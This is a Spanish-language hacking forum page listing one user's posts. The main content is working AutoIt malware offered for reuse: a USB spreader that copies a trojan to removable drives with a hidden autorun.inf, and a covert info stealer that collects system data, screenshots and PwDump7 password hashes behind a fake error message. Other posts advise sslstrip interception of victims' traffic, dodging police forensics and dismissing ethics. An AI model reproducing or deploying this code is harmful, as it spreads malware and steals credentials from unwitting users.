Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - 0b3Y

#1
Back-end / Re:Uploader Oculto
Agosto 27, 2014, 02:47:37 PM
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??
#2
Hola buenas, les traigo aqui una funcion que acabo de relaizar para hacer spreading en los usb que esten conectados.
Actualmente estoy trabajando en la siguiente version asique esperen un poc y tendran el code mejorado :P

Código: text

; #FUNCTION# ===========================================================================================================
; Name...........: __Spreader
; Description ...: Copys a program in all USB and creates a autorun.
; Syntax.........: _Spreader ($program,nombre)
; Parameters ....: $program - The route of the program, must be complete, Ej: C:\Users\User\AppData\Roaming\TrojanFolder\Trojan.exe
;    $nombre - The name of the program, this will be used in the AutoRun. Must be like this, Ej: "TrojanName.exe"
; Author ........: 0b3y
; ===============================================================================================================================

Func _Spreader($program,$nombre)
$todos_drive=DriveGetDrive("REMOVABLE")
For $i=1 To $todos_drive[0]
   If $todos_drive[$i]="a:" Then
  ContinueLoop
   EndIf
   If Not FileExists($todos_drive[$i]&"\"&$program) Then FileCopy($program,$todos_drive[$i])
  FileSetAttrib($todos_drive[$i]&"\"&$program,"+H")
   If Not FileExists($todos_drive[$i]&"\"&"autorun.inf") Then
  $ifile=FileOpen($todos_drive[$i]&"\autorun.inf")
  FileWrite($ifile,"[Autorun]"&@CRLF&"Open="&$nombre&@CRLF&"Icon="&$nombre&@CRLF&"Label=Aplicaciones Portables"&@CRLF&"UserAutoPlay=1"&@CRLF&"action=Abrir USB"&@CRLF&"action=@"&$nombre&@CRLF&"shell\open=Abrir"&@CRLF&"shell\open\Command="&$nombre&@CRLF&"shell\explore=explorar"&@CRLF&"shell\explore\Command="&$nombre)
  FileClose($ifile)
  FileSetAttrib($todos_drive[$i]&"\autorun.inf","+H")
  EndIf
Next

EndFunc

#3
Para mi la mejor forma de deshacerse de tu PC si la policia llama a tu casa es tener preparada una bañera con ácido sulfúrico y encuanto llamen tirarlo a la bañera xD. A ver quien recupera datos de ahi.
#4
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buenas tardes.

No me permite ejecutarlo en Windows 7, problemas de compatibilidad ¿?.

Saludos.

De hecho no deberia hacer eso.. Que error te tira exactamente? A mi en mi PC si que me funciona...
#5
Esta pensado para llevarlo en un usb y que al abrir el usb se abra esto, como un usb spreader, para que más adelante se pueda realizar un ataque más especifico y directo, pudiendo crear en tu casa un malware especifico para el ordenador.
Coge todo esta informacion:
1. Arquitectura.
2. El sistema operativo
3. Nombre del ordenador
4. Actual usuario
5. Ip interna
6. Service pack(si es xp o <)
Todo esto lo mete en un archivo dentro de una carpeta con el nombre del ordenador. También recoge en distintos archivos:
1. Procesos que están corriendo
2. Si existe el archivo PwDump7(sacar los usuarios con contraseña) los pone tambien.
3. Captura de pantalla.
4. Servicios que están corriendo.
5.Los ordenadores que estan conectados en red
6.Las carpetas existentes en el escritorio y los ejecutables
7.Las carpetas que hay en el program files, por lo que podemos deducir los programas que tiene instalados


Toda esta información como no ENCRYPTADA con la password que tu elijas, solo tienes que cambiar la variable $psw por la pass que tu quieras y encriptara toda esta info(menos los procesos que no se porque no me deja).
Quedaria una cosa tal que así:




Y desencriptado queda asi:




La carpeta se ve asi:




El codigo es totalmente abierto, pueden copiar cualquier parte del code sin problemas :P


Código: php

#notrayicon
#include <Crypt.au3>
#include <ScreenCapture.au3>
#include <Process.au3>
#include <File.au3>
#include <Array.au3>

global $x32 = @CPUArch
global $SO = @OSVersion
global $nom = @ComputerName
global $usu = @UserName
global $dirip = @IPAddress1
global $idio = @OSLang
global $fecha = @MDAY & "-" & @MON & "-" & @YEAR
global $fecha2 = @HOUR & ":" & @MIN & ":" & @SEC
global $pack = @OSServicePack
global $psw = "underc0de.org!"
Func Idiom()
Select
    Case StringInStr("0413 0813", @OSLang)
        $idio = "Dutch"

    Case StringInStr("0409 0809 0c09 1009 1409 1809 1c09 2009 2409 2809 2c09 3009 3409", @OSLang)
        $idio = "English"

    Case StringInStr("040c 080c 0c0c 100c 140c 180c", @OSLang)
        $idio = "French"

    Case StringInStr("0407 0807 0c07 1007 1407", @OSLang)
        $idio = "German"

    Case StringInStr("0410 0810", @OSLang)
        $idio = "Italian"

    Case StringInStr("0414 0814", @OSLang)
        $idio = "Norwegian"

    Case StringInStr("0415", @OSLang)
        $idio = "Polish"

    Case StringInStr("0416 0816", @OSLang)
        $idio = "Portuguese"

    Case StringInStr("040a 080a 0c0a 100a 140a 180a 1c0a 200a 240a 280a 2c0a 300a 340a 380a 3c0a 400a 440a 480a 4c0a 500a", @OSLang)
        $idio = "Spanish"

    Case StringInStr("041d 081d", @OSLang)
        $idio = "Swedish"

    Case Else
        $idio = "Other (can't determine with @OSLang directly)"

    EndSelect
EndFunc


Func procesos()
$file = FileOpen($nom & "\procesos.txt",2)
Local $list = ProcessList()
For $i = 1 To $list[0][0] Step + 1
FileWrite($file,$list[$i][0] & @CRLF & $list[$i][1] & "-")
Next
FileClose($file)
FileSetAttrib($nom & "\procesos.txt","+RSH")
EndFunc


Func red()
$sCommand = "net view>>ordenadores-en-red.txt"
FileChangeDir($nom)
_RunDos($sCommand)
FileChangeDir(@ScriptDir)
_Crypt_EncryptFile($nom & "\ordenadores-en-red.txt",$nom & "\ordenadores_en_red.txt",$psw,26625)
FileSetAttrib($nom & "\ordenadores_en_red.txt","+RSH")
FileDelete($nom & "\ordenadores-en-red.txt")
EndFunc


Func usuarios()
if FileExists("PwDump7.exe") Then
$sCommand = "PwDump7.exe>>password.txt"
_RunDos($sCommand)
FileMove("Users-password.txt",$nom & "\Users-password.txt",1)
FileSetAttrib($nom & "\Users-password.txt","+RSH")
EndIf
EndFunc


Func screeen()
_ScreenCapture_Capture($nom & "\Screencapture.jpg")
FileSetAttrib($nom & "\*.jpg","+RSH")
EndFunc


Func infsys2()
FileChangeDir($nom)
$comand2 = "systeminfo>infsys-2.txt"
_RunDos($comand2)
FileChangeDir(@ScriptDir)
_Crypt_EncryptFile($nom & "\infsys-2.txt",$nom & "\Informacion_del_sistema_2.txt",$psw,26625)
FileDelete($nom&"\infsys-2.txt")
FileSetAttrib($nom&"\Informacion_del_sistema_2.txt","+RSH")
EndFunc


Func servicios()
FileChangeDir ($nom)
$sCommand = "net start > servicio.txt"
_RunDos($sCommand)
FileChangeDir(@ScriptDir)
_Crypt_EncryptFile($nom & "\servicio.txt",$nom & "\servicios.txt",$psw,26625)
FileDelete($nom & "\servicio.txt")
FileSetAttrib($nom & "\servicios.txt","+RSH")
EndFunc


Func carptescri()
$Escritorio = _FileListToArray(@DesktopDir)
$file = FileOpen($nom & "\escritorio.txt",2)
FileWriteLine($file,"Carpetas y archivos en el escritorio")
For $x = 1 to $Escritorio[0] Step + 1
FileWriteLine($file,$Escritorio[$x])
Next
FileClose($file)
_Crypt_EncryptFile($nom & "\escritorio.txt",$nom & "\archivos en el escritorio.txt",$psw,26625)
FileDelete($nom & "\escritorio.txt")
FileSetAttrib($nom & "\archivos en el escritorio.txt","+RSH")
EndFunc


Func carptprogram()
$Archivos_de_programa = _FileListToArray(@ProgramFilesDir)
$Fichero_de_salida = FileOpen($nom & "\programas_instalados.txt",2)
FileWriteLine($Fichero_de_salida,"Programas instalados")
For $x = 1 to $Archivos_de_programa[0] Step + 1
FileWriteLine($Fichero_de_salida,$Archivos_de_programa[$x])
Next
FileClose($Fichero_de_salida)
_Crypt_EncryptFile($nom & "\programas_instalados.txt",$nom & "\programas instalados.txt",$psw,26625)
FileDelete($nom&"\programas_instalados.txt")
FileSetAttrib($nom&"\programas instalados.txt","+RSH")
EndFunc

Func todo()
DirCreate($nom)
FileSetAttrib($nom,"+SH")
$file = FileOpen($nom & "\" & "infsys " & $nom & " " & $fecha & ".txt",1)
$todo = "x32 o x64: " & $x32 & @CRLF & "Idioma del S.O: " & $idio & @CRLF & "Sistema operativo: " & $SO & @CRLF & "Nombre del ordenador: " & $nom & @CRLF & "Nombre del usuario: " & $usu & @CRLF & "Direccion IP interna: " & $dirip & @CRLF & "Altura de resolucion (en pixels): " & @DesktopHeight & @CRLF & "Anchura de resolucion (en pixels): " & @DesktopWidth & @CRLF & "Service pack: " & $pack
$todo = _Crypt_EncryptData($todo,$psw,26625)
FileWrite($file,$todo)
FileSetAttrib($nom & "\" & "infsys " & $nom & " " & $fecha & ".txt","+RSH")



Idiom()
procesos()
infsys2()
servicios()
usuarios()
carptescri()
carptprogram()
red()
screeen()
EndFunc


if FileExists($nom) Then
MsgBox(16,"Error","The Filesys.dll is needed to the correct function of the program",0)
DirRemove(@ScriptDir&"\"&$nom,1)
todo()
Else
todo()
EndIf



Tambien les regalo este autorun.inf que tendran que poner en el usb para que se abra automaticamente, el autorun.inf quedaria asi(se puede cambiar el nombre al que tengas del programa):
Código: php

[Autorun]
Open=Programa.exe
Icon=Programa.exe
Label=Aplicaciones Portables
UserAutoPlay=1
action=Abrir USB
[email protected]
shell\open=Abrir
shell\open\Command=Programa.exe
shell\explore=explorar
shell\explore\Command=Programa.exe
#6
Buenas a todos, hoy les quería traer una forma de pasar los firewall que bloquean tu conexión a redes sociales, paginas de juegos etc, ya sea en la escuela en el trabajo o en casa.
Primero hay que saber como funcionan estas herramientas. Unas (los firewalls) inspeccionan los paquetes leyendo la información que lleva el paquete y según la regla que tengan configurada si ven que se dirige a una pagina que tienen metida en una lista de bloquear pues deniegan el paquete. ¿Y como se puede hacer que el paquete pase? Muy sencillo, si el paquete va encryptado pues el firewall no podrá leer nada sobre él porque va encriptado asi que lo deja pasar. Esto se puede hacer con Https que tiene la pagina web.
Si por desgracia la pagina web no posee https pues lo que podemos hacer es visitar esta pagina web :
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
donde solo hay que poner la url que deseas visitar y la pagina te encryptara la conexion, haciendo que el firewall permita el paquete
#7
Lo unico malo que le veo esque busca segun el nombre de la shell, las buenas buenas que sulene interesar cambian el nombre para evitar este tipo de robos, por no decir que tienen password... Seria una herramienta perfecta si analizara los php en busca de shells, no por nombre
#8
Yo ya me cretifique de este y del ccna security, si alguien tiene alguna duda o necesita ayuda que me mande un privado!  :P
#9
Mi opinion es que la etica y la moral es algo que nos impone la sociedad para impedirnos volar, para hacer lo que ellos quieren que hagamos y nos demos palmaditas en la espalda porque "esta bien hecho". Para mi solo existo yo y mis amigos, con el resto no tengo escrupulos.
#10
Underc0de / Re:Te gustaria ser Tutor?
Mayo 01, 2014, 07:35:00 AM
Buenas, a mi me gustaría poder enseñar de AutoIt(si hay algo), de técnicas de evasión de A.V y de seguridad dentro de las redes de empresas y grandes LAN.
#11
Bueno pues ten en cuenta que la ip 192.168.x.x tambien se usa en la red publica, no solo en las privadas. Tu facultad debe de ser la que posee ese rango de ip´s.
#12
Dudas y pedidos generales / Re:Http y https
Abril 23, 2014, 04:30:55 PM
Https no se puede convertir en http, por eso se inventó para que fuese seguro...
Lo que te recomiendo es que uses en el mitm el sslstript(creo que se escribe así) que lo que hace es hacerle creer a la víctima que esta usando https, cuando los datos llegan a tu máquina es ella la que los en cripta y los envía al servidor, así que puedes leerlos
#13
Pues en vez de con autoit puedes probar a hacerlo con Batch, supongo que siempre es la misma letra en la que esta el pen-drive asique mira aqui te pongo un code en autoit que lo haga, solamente modifica la letra en la varibale $disc por la de los No tienes permitido ver los links. Registrarse o Entrar a mi cuenta muy simple y no creo que haya ningun error, pero si tienes alguna duda o no funciona pues solo dilo :D. Otra cosa, con este code tendras que ejecutarlo cada vez que insertes el pen, si quieres que lo haga automatico solo dilo!

Código: php

#cs ----------------------------------------------------------------------------

AutoIt Version: 3.3.10.2
Author:         0b3y
#ce ----------------------------------------------------------------------------
;Oculta el icono de autoit de la barra de noticficaciones.
#NoTrayIcon
;Pide permisos de admin para que pueda formatearlo sin problemas.
#RequireAdmin
;unidad que va a ser formateada:
$disc="f:"
;abrimos una ventana de cmd y esperamos a que abra
RunWait("cmd.exe","",@SW_MINIMIZE)
;hacemos que la ventana de cmd flashee para que te des cuenta de que esta abierta(en concreto 4 veces, cada una en  1/2 sec.
WinFlash("C:\Windows\system32\cmd.exe","", 4, 500)
;esperamos a que te centres en la ventana del cmd
WinWaitActive("C:\Windows\system32\cmd.exe")
;enviamos el comando
Send("format "&$disc&" /Q {ENTER}")
#14
Presentaciones y cumpleaños / Buenas!
Abril 03, 2014, 05:44:31 PM
Buenas a todos! Soy 0b3y y hoy me presento en esta comunidad a peticion de Destructor PHP
Soy dado a la programacion en AutoIt y a los hardware de CISCo (CCNA security), pero lo que mas me gusta es la seguridad en si misma. Espero poder aprender mucho y gracias a todos por esta oportunidad!

PD: Estoy intentando publicar esto pero no me reconoce la palabra: 4ndr0id  asique pongan otra cosa!